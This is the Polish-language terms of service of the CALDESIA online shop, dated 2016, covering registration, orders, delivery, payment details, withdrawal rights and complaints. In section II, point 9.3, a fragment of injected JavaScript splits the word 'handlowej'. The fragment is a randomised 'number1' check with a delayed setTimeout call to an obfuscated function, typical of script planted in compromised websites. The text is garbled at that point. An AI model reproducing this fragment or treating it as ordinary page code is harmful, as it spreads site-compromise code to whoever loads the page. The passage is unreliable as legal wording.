Regulamin sklepu

Regulamin sklepu internetowego CALDESIA
obowiązujący od 29.08.2016 r.

I. Postanowienia ogólne

 1. Niniejszy Regulamin określa zasady korzystania ze sklepu internetowego dostępnego pod adresem www.caldesia.pl.
 2. Niniejszy Regulamin jest regulaminem, o którym mowa w art. 8 Ustawy o świadczeniu usług drogą elektroniczną.
 3. Sklep internetowy, działający pod adresem www.caldesia.pl, prowadzony jest przez CALDESIA Beata Janczak z siedzibą w Bolechowie przy ul. Krętej 30 (62-005 Bolechowo) powiat poznański, województwo wielkopolskie (jednoosobowa działalność gospodarcza) z wpisem do Centralnej Ewidencji Działalności Gospodarczej pod numerem NIP: 564-161-05-51Regon: 302737451.
 4. Dane kontaktowe:
  CALDESIA
  Beata Janczak
  ul. Kręta 30
  62-005 Bolechowo
  tel. 661 760 893
  e-mail: beatajanczak@caldesia.pl
 5. Ilekroć w niniejszym Regulaminie użyte są wymienione poniżej terminy należy przez nie rozumieć:
  1. Klient – osoba fizyczna, osoba prawna lub jednostka organizacyjna nie będąca osobą prawną, której przepisy szczególne przyznają zdolność prawną, a która dokonuje Zamówienia w ramach Sklepu internetowego CALDESIA.
  2. Kodeks Cywilny – ustawa z dnia 23 kwietnia 1964 r. (Dz. U. z 1964 r. Nr 16, poz. 93 z późn. zm.);
  3. Konsument – Klient będący osobą fizyczną, który dokonuje czynności prawnej z CALDESIA niezwiązanej bezpośrednio z jego działalnością gospodarczą lub zawodową, w szczególności który składa Zamówienie w Sklepie internetowym;
  4. Regulamin – niniejszy Regulamin świadczenia usług drogą elektroniczną w ramach Sklepu internetowego CALDESIA;
  5. Sklep internetowy (Sklep) – serwis internetowy prowadzony przez CALDESIA dostępny pod adresem www.caldesia.pl, za pośrednictwem którego Klient może składać Zamówienia;
  6. CALDESIA – CALDESIA Beata Janczak z siedzibą w Bolechowie przy ul. Krętej 30 (62-005 Bolechowo) prowadząca jednoosobową działalność gospodarczą z wpisem do Centralnej Ewidencji Działalności Gospodarczej pod numerem NIP: 564-161-05-51Regon: 302737451;
  7. Termin realizacji zamówienia – maksymalny czas realizacji zamówienia, wynikający bezpośrednio z Terminu realizacji poszczególnych produktów składających się na zamówienie;
  8. Towar (Produkt) – wszelkie produkty prezentowane w Sklepie internetowym;
  9. Umowa sprzedaży – umowa sprzedaży Towarów w rozumieniu Kodeksu Cywilnego, zawarta pomiędzy CALDESIA Beata Janczak z siedzibą w Bolechowie przy ul. Krętej 30 (62-005 Bolechowo), prowadząca jednoosobową działalność gospodarczą z wpisem do Centralnej Ewidencji Działalności Gospodarczej pod numerem NIP: 564-161-05-51Regon: 302737451;
   a Klientem, zawierana z wykorzystaniem serwisu internetowego Sklepu;
  10. Ustawa o świadczeniu usług drogą elektroniczną – ustawa z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. Nr 144, poz. 1204 z późn. zm.);
  11. Ustawa o prawach konsumenta – ustawa z dnia 30 maja 2014 r. o prawach konsumenta (Dz. U. z 2014 r., poz. 827);
  12. Zamówienie – oświadczenie woli Klienta, zmierzające bezpośrednio do zawarcia Umowy sprzedaży, określające w szczególności rodzaj, liczbę i cenę Towaru.
 6. Niniejszy Regulamin określa zasady korzystania ze Sklepu internetowego, w szczególności zasady dokonywania rejestracji i korzystania z konta w ramach Sklepu internetowego, warunki i zasady składania drogą elektroniczną Zamówień w ramach Sklepu internetowego, zasady zawierania Umów sprzedaży z wykorzystaniem usług świadczonych w ramach Sklepu internetowego oraz zasady postępowania reklamacyjnego.
 7. Wszystkie Produkty znajdujące się w asortymencie Sklepu internetowego są nowe.
 8. W celu korzystania ze Sklepu internetowego Klient powinien we własnym zakresie uzyskać dostęp do stanowiska komputerowego lub urządzenia końcowego z dostępem do Internetu.
 9. Klienci mogą uzyskać dostęp do niniejszego Regulaminu w każdym czasie za pośrednictwem linku zamieszczonego na stronie głównej serwisu oraz pobrać go i sporządzić jego wydruk.
 10. Informacje o Towarach podane na stronach internetowych Sklepu, w szczególności ich opisy, parametry techniczne i użytkowe oraz ceny, stanowią zaproszenie do zawarcia umowy, w rozumieniu art. 71 Kodeksu Cywilnego.

II. Zasady korzystania ze Sklepu internetowego

 1. W celu rozpoczęcia korzystania ze Sklepu internetowego nie jest konieczna rejestracja w jego ramach.
 2. Każdy Klient ma możliwość rejestracji.
 3. Rejestracja następuje poprzez wypełnienie i zaakceptowanie formularza rejestracyjnego, udostępnianego na jednej ze stron Sklepu.
 4. Warunkiem rejestracji jest wyrażenie zgody na treść Regulaminu oraz podanie danych osobowych oznaczonych jako obowiązkowe.
 5. Klient może w każdej chwili wyrejestrować się ze Sklepu, bez podania przyczyny i bez ponoszenia kosztów, przez przesłanie CALDESIA za pośrednictwem poczty elektronicznej na adres: beatajanczak@caldesia.pl albo w formie pisemnej na adres pocztowy CALDESIA wskazany w pkt. 3. § I. Regulaminu, żądania usunięcia konta Klienta wraz ze wskazaniem adresu poczty elektronicznej (adresu e-mail) aktualnie zarejestrowanego w Sklepie internetowym.
 6. CALDESIA może pozbawić Klienta prawa do korzystania ze Sklepu internetowego, jak również może ograniczyć jego dostęp do części lub całości zasobów Sklepu internetowego, ze skutkiem natychmiastowym, w przypadku naruszenia przez Klienta Regulaminu, a w szczególności, gdy Klient:
  1. podał w trakcie rejestracji w Sklepie internetowym dane niezgodne z prawdą, niedokładne lub nieaktualne, wprowadzające w błąd lub naruszające prawa osób trzecich;
  2. dopuścił się za pośrednictwem Sklepu internetowego naruszenia dóbr osobistych osób trzecich, w szczególności dóbr osobistych innych Klientów Sklepu internetowego;
  3. dopuści się innych zachowań, które zostaną uznane przez CALDESIA za zachowania niezgodne z obowiązującymi przepisami prawa lub ogólnymi zasadami korzystania z sieci Internet lub godzące w dobre imię CALDESIA.
 7. Osoba, która została pozbawiona prawa do korzystania ze sklepu internetowego, nie może dokonać powtórnej rejestracji bez uprzedniej zgody CALDESIA.
 8. W celu zapewnienia bezpieczeństwa przekazu komunikatów i danych w związku ze świadczonymi w ramach witryny usługami, Sklep internetowy podejmuje środki techniczne i organizacyjne odpowiednie do stopnia zagrożenia bezpieczeństwa świadczonych usług, w szczególności środki służące zapobieganiu pozyskiwania i modyfikacji przez osoby nieuprawnione danych osobowych przesyłanych w Internecie.
 9. Klient zobowiązany jest w szczególności do:
  1. niedostarczania i nieprzekazywania treści zabronionych przez przepisy prawa, np. treści propagujących przemoc, zniesławiających lub naruszających dobra osobiste i inne prawa osób trzecich;
  2. korzystania ze Sklepu internetowego w sposób nie zakłócający jego funkcjonowania, w szczególności poprzez użycie określonego oprogramowania lub urządzeń;
  3. niepodejmowania działań takich jak: rozsyłanie lub umieszczanie w ramach Sklepu internetowego niezamówionej informacji handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlowej (spam);
  4. korzystania ze Sklepu internetowego w sposób nieuciążliwy dla innych klientów oraz dla CALDESIA;
  5. korzystania z wszelkich treści zamieszczonych w ramach Sklepu internetowego jedynie w zakresie własnego użytku osobistego;
  6. korzystania ze Sklepu internetowego w sposób zgodny z przepisami obowiązującego na terytorium Rzeczypospolitej Polskiej prawa, postanowieniami Regulaminu, a także z ogólnymi zasadami korzystania z sieci Internet.

III. Procedura zawarcia Umowy sprzedaży

 1. W celu zawarcia Umowy sprzedaży za pośrednictwem Sklepu internetowego należy wejść na stronę internetową www.caldesia.pl, dokonać wyboru produktów, podejmując kolejne czynności w oparciu o wyświetlane Klientowi komunikaty oraz informacje dostępne na stronie.
 2. Wybór zamawianych Towarów przez Klienta jest dokonywany poprzez ich dodanie do koszyka.
 3. W trakcie składania Zamówienia, do momentu naciśnięcia przycisku „KUPUJĘ I PŁACĘ” Klient ma możliwość modyfikacji wprowadzonych danych oraz w zakresie wyboru Towaru. W tym celu należy kierować się wyświetlanymi Klientowi komunikatami oraz informacjami dostępnymi na stronie.
 4. Po podaniu przez Klienta korzystającego ze Sklepu internetowego wszystkich niezbędnych danych, wyświetlone zostanie podsumowanie złożonego Zamówienia. Podsumowanie złożonego Zamówienia będzie zawierać informacje dotyczące:
  1. przedmiotu zamówienia;
  2. jednostkowej oraz łącznej ceny zamawianych produktów lub usług, w tym kosztów dostawy oraz dodatkowych kosztów (jeśli występują) wraz ze wszystkimi należnymi podatkami oraz innymi składnikami;
  3. terminu realizacji zamówienia
  4. wybranej metody płatności;
  5. wybranego sposobu dostawy;
 5. W celu wysłania Zamówienia konieczne jest dokonanie akceptacji treści Regulaminu, podanie danych osobowych oznaczonych jako obowiązkowe oraz naciśnięcie przycisku „KUPUJĘ I PŁACĘ”. Zamówienie złożone za pośrednictwem Sklepu internetowego pociąga za sobą obowiązek zapłaty.
 6. Wysłanie przez Klienta Zamówienia stanowi oświadczenie woli zawarcia z CALDESIA Umowy sprzedaży, zgodnie z treścią Regulaminu.
 7. Po złożeniu Zamówienia Klient otrzymuje wiadomość e-mail zawierającą potwierdzenie otrzymania Zamówienia, w tym ostateczne potwierdzenie wszystkich istotnych elementów Zamówienia oraz dostęp w formie linków do Regulaminu, Formularza odstąpienia od Umowy i Formularza reklamacji z możliwością pobrania ich w formacie PDF.
 8. Umowę traktuje się za zawartą z momentem otrzymania przez Klienta wiadomości e-mail, o której mowa powyżej.
 9. Umowa sprzedaży zawierana jest w języku polskim, angielskim lub niemieckim w zależności od opcji ustawienia języka, którą wybierze Klient, o treści zgodnej z Regulaminem.

IV. Dostawa Towarów i Termin realizacji Zamówień

 1. Zamówienia złożone w Sklepie internetowym CALDESIA będą realizowane po otrzymaniu płatności.
 2. Dostawa Towarów nie jest ograniczona do obszaru Rzeczpospolitej Polskiej i odbywa się pod adres wskazany przez Klienta w trakcie składania Zamówienia.
 3. Dostawa zamówionych Towarów odbywa się listem priorytetowym poleconym lub przesyłką kurierską Kurier 48 za pośrednictwem Poczty Polskiej S.A., a  wyboru sposobu dostawy zamówionych produktów dokonuje Klient. Koszty dostawy zostaną wskazane w czasie składania Zamówienia.
 4. Termin realizacji zamówień produktów w Sklepie internetowym CALDESIA jest określony indywidualnie dla każdego produktu.
 1. dla produktów w pojedynczych egzemplarzach z informacją: „Zdjęcia przedstawiają oferowany produkt”, wynosi 1-2 dni robocze od dnia zaksięgowania wpłaty na koncie;
 2. dla produktów będących w stałej ofercie sklepu z informacją: „Zdjęcia są przykładem produktu”, wynosi 3-5 dni robocze od dnia zaksięgowania wpłaty na koncie;
 3. dla produktów, których wykonanie wymaga większego nakładu pracy i czasu, wynosi 1 tydz. – 2 tyg.
 4. W przypadku zamówienia składającego się z jednego produktu o krótkim czasie realizacji (1-2 dni lub 3-5 dni), lecz w ilości większej niż 5 sztuk, termin realizacji zamówienia może zostać wydłużony, o czym Klient zostanie poinformowany przez CALDESIA.
 5. w przypadku Zamówienia składającego się z kilku produktów o różnym czasie realizacji, termin realizacji Zamówienia będzie taki jak dla produktu o najdłuższym czasie realizacji.
 6. CALDESIA ma prawo do zrealizowania zamówienia szybciej niż wynika to z podanego Klientowi Terminu realizacji zamówienia. W przypadku, gdy Klient nie chce otrzymać Zamówienia wcześniej niż wynika to z Terminu realizacji zamówienia, powinien poinformować o tym CALDESIA.
 1. CALDESIA zastrzega sobie prawo do przerw w realizacji Zamówień, szczególnie w okresach poprzedzających Święta Bożego Narodzenia i Święta Wielkanocne. Informacje o przerwach będą zamieszczane z wyprzedzeniem na Stronie głównej Sklepu internetowego.
 2. Klienci mogą uzyskać dostęp do niniejszego Regulaminu w każdym czasie za pośrednictwem linku zamieszczonego na stronie głównej serwisu (http://www.caldesia.pl/regulamin-sklepu/) oraz pobrać go w formacie PDF i sporządzić jego wydruk.
 3. Utrwalenie, zabezpieczenie, udostępnienie oraz potwierdzenie Klientowi istotnych postanowień Umowy sprzedaży Towarów następuje poprzez przesłanie Klientowi na podany adres e-mail oraz poprzez dołączenie do przesyłki zawierającej Towar paragonu lub faktury VAT.

V. Ceny i metody płatności

 1. Ceny Produktów w sklepie internetowym CALDESIA podawane są w złotych polskich i zawierają podatek VAT.
 2. Ceny Produktów w Sklepie są cenami detalicznymi.
 3. CALDESIA zastrzega sobie prawo do zmian cen Produktów w Sklepie.
 4. CALDESIA oferuje rabaty, promocje, okresowe obniżki cen i wyprzedaże.
 5. Klient ma możliwość negocjowania cen, przy czym CALDESIA zastrzega sobie prawo odmowy negocjacji.
 6. Klient ma możliwość uiszczenia płatności w następujący sposób:
  1. Przelew bankowy krajowy. Dane do przelewu:
   CALDESIA Beata Janczak
   ul. Kręta 30, 62-005 Bolechowo
   Bank Pekao SA, nr konta: 75 1240 1747 1111 0010 5817 4097
  2. Przelew zagraniczny na konto złotówkowe. Dane do przelewu:
   CALDESIA Beata Janczak
   ul. Kręta 30, 62-005 Bolechowo, POLSKA
   Bank Pekao SA, I O w Poznaniu
   Św. Marcina 52/56
   61-807 Poznań
   SWIFT (BIC): PKOPPLPW
   IBAN: PL75 1240 1747 1111 0010 5817 4097
  3. Przelew zagraniczny na konto walutowe. Dane do przelewu:
   Beata Janczak
   Ul. Kręta 30, 62-005 Bolechowo, POLSKA
   Bank Pekao SA, I O w Poznaniu
   Św. Marcina 52/56
   61-807 Poznań
   SWIFT (BIC): PKOPPLPW
   IBAN: PL06 1240 1747 1787 0010 6862 5105
  4. Płatnością w systemie PayPal.com; beatajanczak@caldesia.pl
  5. Płatnością w systemie PayU.com;
  6. Gotówką przy odbiorze osobistym w siedzibie firmy CALDESIA (ul. Kreta 30, 62-005 Bolechowo koło Poznania)
 7. Klient winien opłacić zakupiony towar/towary w terminie 7 dni roboczych od dnia zawarcia Umowy sprzedaży.
 8. W przypadku braku płatności w terminie 7 dni od dnia zawarcia Umowy sprzedaży i braku kontaktu ze strony Klienta w tym czasie, zamówienie będzie anulowane, a Klient zostanie o tym poinformowany.
 9. Termin opłaty za zamówienie może zostać przedłużony za zgodą CALDESIA na wyraźną prośbę Klienta.
 10. Wykonanie i przesłanie Klientowi dodatkowych zdjęć produktu na jego życzenie podlega dodatkowej opłacie w wysokości 20 zł brutto (dwadzieścia złotych brutto).

VI. Uprawnienie do odstąpienia od umowy

 1. Zgodnie z art. 27 ustawy z dnia 30 maja 2014 r. o prawach konsumenta (Dz.U. z 2014 r. poz. 827) Klient będący Konsumentem, który zawarł za pośrednictwem Sklepu internetowego umowę na odległość, może w terminie 14 dni odstąpić od tej umowy bez podania jakiejkolwiek przyczyny.
 2. Bieg terminu do odstąpienia od umowy rozpoczyna się od dnia, w którym Konsument objął towar w posiadanie lub w którym wskazana przez Konsumenta osoba trzecia inna niż przewoźnik weszła w posiadanie towaru. W przypadku umowy, która obejmuje wiele rzeczy, które są dostarczane osobno, partiami lub w częściach bieg terminu do odstąpienia od umowy rozpoczyna się od dnia, w którym Konsument objął w posiadanie ostatnią z rzeczy, ostatnią partię lub część lub w którym wskazana przez Konsumenta osoba trzecia inna niż przewoźnik weszła w posiadanie ostatniej z rzeczy, ostatniej partii lub części. W przypadku umowy, która polega na regularnym dostarczaniu rzeczy przez określony czas bieg terminu do odstąpienia od umowy rozpoczyna się od objęcia w posiadanie pierwszej rzeczy. Dla pozostałych umów bieg terminu do odstąpienia od umowy rozpoczyna się od dnia zawarcia umowy.
 3. Zgodnie z art. 30 ustawy z dnia 30 maja 2014 r. o prawach konsumenta (Dz.U. z 2014 r. poz. 827) Konsument może odstąpić od umowy informując CALDESIA o swojej decyzji o odstąpieniu od umowy w drodze jednoznacznego oświadczenia wysłanego na adres siedziby firmy CALDESIA (ul. Kręta 30, 62-005 Bolechowo), bądź adres elektroniczny Sklepu (beatajanczak@caldesia.pl) określone w pkt. 3. § I. niniejszego Regulaminu. Oświadczenie o odstąpieniu od umowy można złożyć w dowolnej formie. CALDESIA poinformuje Konsumenta o otrzymaniu oświadczenia o odstąpieniu od umowy.
 4. Do zachowania terminu do odstąpienia od umowy wystarczy wysłanie informacji dotyczącej wykonania przysługującego prawa odstąpienia od umowy przed upływem terminu do odstąpienia od umowy określonego w pkt. 1. § VI.
 5. W przypadku odstąpienia od umowy, umowa ta uważana jest za niezawartą. Jeśli Klient będący Konsumentem złożył oświadczenie o odstąpieniu od umowy zanim CALDESIA przyjęła jego ofertę, oferta przestaje wiązać.
 6. W przypadku odstąpienia od umowy, Konsument ma obowiązek zwrócić towar niezwłocznie, nie później jednak niż w terminie 14 dni od dnia, w którym poinformował CALDESIA o odstąpieniu od umowy. Do zachowania terminu wystarczy, jeśli Konsument dostarczy lub wyśle towar przed upływem 14 dniowego terminu na adres CALDESIA określony w pkt. 3. § I. niniejszego Regulaminu (CALDESIA, ul. Kręta 30, 62-005 Bolechowo).
 7. Konsument zobowiązany jest ponieść bezpośrednie koszty zwrotu Towaru.
 8. W przypadku odstąpienia od umowy, CALDESIA zwróci Konsumentowi wszystkie otrzymane od niego płatności, w tym koszty dostarczenia Towaru niezwłocznie po otrzymaniu zwrotu towaru, nie później jednak niż w terminie 14 dni od dnia otrzymania zwrotu towaru.
 9. Zwrot płatności zostanie dokonany przez CALDESIA przy użyciu tego samego sposobu zapłaty, jakiego użył Konsument, chyba że Konsument wyraźnie zgodził się na inny sposób zwrotu, który nie wiąże się dla niego z żadnymi kosztami.
 10. Konsument ponosi odpowiedzialność za zmniejszenie wartości rzeczy będące wynikiem korzystania z niej w sposób inny niż było to konieczne do stwierdzenia charakteru, cech i funkcjonowania rzeczy.
 11. Zgodnie z art. 38 ustawy z dnia 30 kwietnia 2014 roku o prawach konsumenta (Dz. U. z 2014 r., poz. 827) prawo odstąpienia od umowy zawartej na odległość nie przysługuje Konsumentowi w odniesieniu do umów:
  1. w której przedmiotem świadczenia jest Produkt wykonany według specyfikacji Konsumenta lub służący zaspokojeniu jego zindywidualizowanych potrzeb;
  2. w której przedmiotem świadczenia są rzeczy, które po dostarczeniu, ze względu na swój charakter, zostają nierozłącznie połączone z innymi rzeczami.
 1. Jeżeli zakupiony Produkt został uszkodzony z winy Konsumenta, Konsument nie może skorzystać z prawa odstąpienia od Umowy.

VII. Reklamacje zakupionych Towarów

 1. CALDESIA jest zobowiązana do dostarczenia Klientom Sklepu towaru bez wad fizycznych i prawnych. CALDESIA ponosi wobec Klientów odpowiedzialność za wady towaru na zasadach określonych w przepisach ustawy z dnia 23 kwietnia 1964 r. Kodeks cywilny (Dz. U. z 1964 r. Nr 16, poz. 93 z późn. zm.), w szczególności w art. 556 i następnych Kodeksu cywilnego.
 2. Jeżeli rzecz sprzedana ma wadę, Klient może złożyć oświadczenie o obniżeniu ceny albo odstąpieniu od umowy, chyba że sprzedawca niezwłocznie i bez nadmiernych niedogodności dla Klienta wymieni rzecz wadliwą na wolną od wad albo wadę usunie.
 3. Klient nie może złożyć reklamacji, jeżeli wada jest nieistotna.
 4. Reklamacje można złożyć w dowolnej formie poprzez kontakt e-mail: beatajanczak@caldesia.pl lub adres siedziby firmy: CALDESIA, ul. Kręta 30, 62-005 Bolechowo.
 5. Zgłoszenie reklamacji winno zawierać w szczególności: imię i nazwisko, adres do korespondencji, adres poczty elektronicznej (adres e-mail), na który ma zostać wysłana odpowiedź na reklamację, jeśli Klient życzy sobie otrzymać odpowiedź na reklamację za pośrednictwem poczty elektronicznej, datę nabycia towaru, rodzaj reklamowanego towaru, dokładny opis wady oraz datę jej stwierdzenia, żądanie Klienta, a także preferowany przez Klienta sposób poinformowania o sposobie rozpatrzenia reklamacji. Wraz ze zgłoszeniem reklamacji należy dostarczyć CALDESIA dowód zakupu towaru. Może to być na przykład kopia paragonu lub kopia faktury, wydruk z karty płatniczej albo inny dowód zakupu towaru.
 6. CALDESIA rozpatrzy i ustosunkuje się do reklamacji niezwłocznie, nie później niż w terminie 14 dni od dnia złożenia reklamacji. O sposobie rozpatrzenia reklamacji Klient zostanie poinformowany na dane kontaktowe wskazane w zgłoszeniu reklamacji.

VIII. Reklamacje w zakresie świadczenia usług drogą elektroniczną

 1. CALDESIA podejmuje działania w celu zapewnienia w pełni poprawnego działania Sklepu, w takim zakresie, jaki wynika z aktualnej wiedzy technicznej i zobowiązuje się usunąć w rozsądnym terminie wszelkie nieprawidłowości zgłoszone przez Klientów.
 2. Klient zobowiązany jest niezwłocznie powiadomić CALDESIA o wszelkich nieprawidłowościach lub przerwach w funkcjonowaniu serwisu Sklepu internetowego.
 3. Nieprawidłowości związane z funkcjonowaniem Sklepu Klient może zgłaszać mailowo na adres beatajanczak@caldesia.pl
 4. Zgłoszenie reklamacji winno zawierać imię i nazwisko, adres do korespondencji, rodzaj i datę wystąpienia nieprawidłowości związanej z funkcjonowaniem Sklepu.
 5. CALDESIA zobowiązuje się do rozpatrzenia każdej reklamacji, o której mowa w niniejszym rozdziale, w terminie do 14 dni, a gdyby to nie było możliwe, do poinformowania w tym okresie Klienta, kiedy reklamacja zostanie rozpatrzona.

IX. Pozasądowe sposoby rozpatrywania reklamacji i dochodzenia roszczeń

 1. W razie zaistnienia sporu Klient będący Konsumentem posiada możliwość skorzystania z pozasądowych sposobów rozpatrywania reklamacji i dochodzenia roszczeń. W szczególności Klient uprawniony jest do zwrócenia się do wojewódzkiego inspektora Inspekcji handlowej z wnioskiem o wszczęcie postępowania mediacyjnego, bądź uprawniony jest do zwrócenia się do stałego polubownego sądu konsumenckiego działającego przy wojewódzkim inspektorze Inspekcji Handlowej z wnioskiem o rozstrzygnięcie sporu wynikłego z zawartej umowy sprzedaży.
 2. Klient będący Konsumentem może również uzyskać bezpłatną pomoc i potrzebne informacje u powiatowych rzeczników konsumentów.
 3. Klient będący Konsumentem może skorzystać również z platformy internetowego systemu rozstrzygania sporów pomiędzy konsumentami i przedsiębiorcami (Online Dispute Resolution, zwanej dalej ODR) dostępnej pod adresem http://ec.europa.eu/consumers/odr/ działającej na terytorium Unii Europejskiej. Platforma ODR umożliwia uzyskanie kompleksowej obsługi dla konsumentów i przedsiębiorców dążących do pozasądowego rozstrzygania sporów. Platforma ODR jest interaktywną stroną internetową, do której możliwy jest elektroniczny i bezpłatny dostęp we wszystkich językach urzędowych Unii Europejskiej.
 4. Skorzystanie z pozasądowych sposobów rozpatrywania reklamacji i dochodzenia roszczeń ma charakter dobrowolny i obie strony muszą wyrazić zgodę na postępowanie.
 5. Regulamin organizacji i działania stałych polubownych sądów konsumenckich określa Rozporządzenie Ministra Sprawiedliwości z dnia 25 września 2001 r. w sprawie określenia regulaminu organizacji i działania stałych polubownych sądów konsumenckich (Dz.U. 2001, nr 113, poz. 1214).
 6. Szczegółowe informacje o pozasądowych sposobach rozwiązywania sporów pomiędzy przedsiębiorcą, a konsumentem można znaleźć na stronie internetowej Urzędu Ochrony Konkurencji i Konsumentów pod adresem: http://www.uokik.gov.pl/spory_konsumenckie.php
 7. W razie jakichkolwiek pytań związanych z pozasądowymi sposobami rozstrzygania sporów zachęca się również do kontaktu bezpośrednio z CALDESIA.

X. Postanowienia końcowe

 1. W sprawach nieuregulowanych w niniejszym Regulaminie mają zastosowanie przepisy prawa polskiego, w szczególności ustawy z dnia 23 kwietnia 1964 r. Kodeks cywilny (Dz. U. z 1964 r. Nr 16, poz. 93 z późn. zm.), a w przypadku Klientów będących Konsumentami także przepisy ustawy z dnia 30 kwietnia 2014 r. o prawach konsumenta (DZ. U. z 2014 r., poz. 827), jak również przepisy ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. Nr 144, poz. 1204 z późn. zm.).
 2. Niniejszy Regulamin zawiera następujące załączniki:
  1. Załącznik nr 1 – Pouczenie o prawie odstąpienia od umowy;
  2.  
  3. CALDESIA zastrzega sobie prawo do zmiany niniejszego Regulaminu jedynie z ważnych przyczyn technicznych, prawnych lub organizacyjnych. Zmiana Regulaminu staje się skuteczna i wchodzi w życie w terminie wskazanym przez CALDESIA, nie wcześniej jednak niż po upływie 14 dni kalendarzowych liczonych od momentu zamieszczenia na stronie internetowej Sklepu informacji o zmianie Regulaminu. Klienci, którzy dokonali rejestracji w Sklepie internetowym zostaną dodatkowo poinformowani o zmianie Regulaminu poprzez przesłanie na podany w formularzu rejestracyjnym adres poczty elektronicznej (e-mail) wiadomości o zmianie Regulaminu wraz z zestawieniem tych zmian.
 3. Niniejszy Regulamin wchodzi w życie z dniem (29.08.2016 r.)  i obowiązuje do umów zawartych od tego dnia.

Dokumenty do pobrania/wydrukowania (pliki w formacie pdf):

 1. Regulamin Sklepu internetowego CALDESIA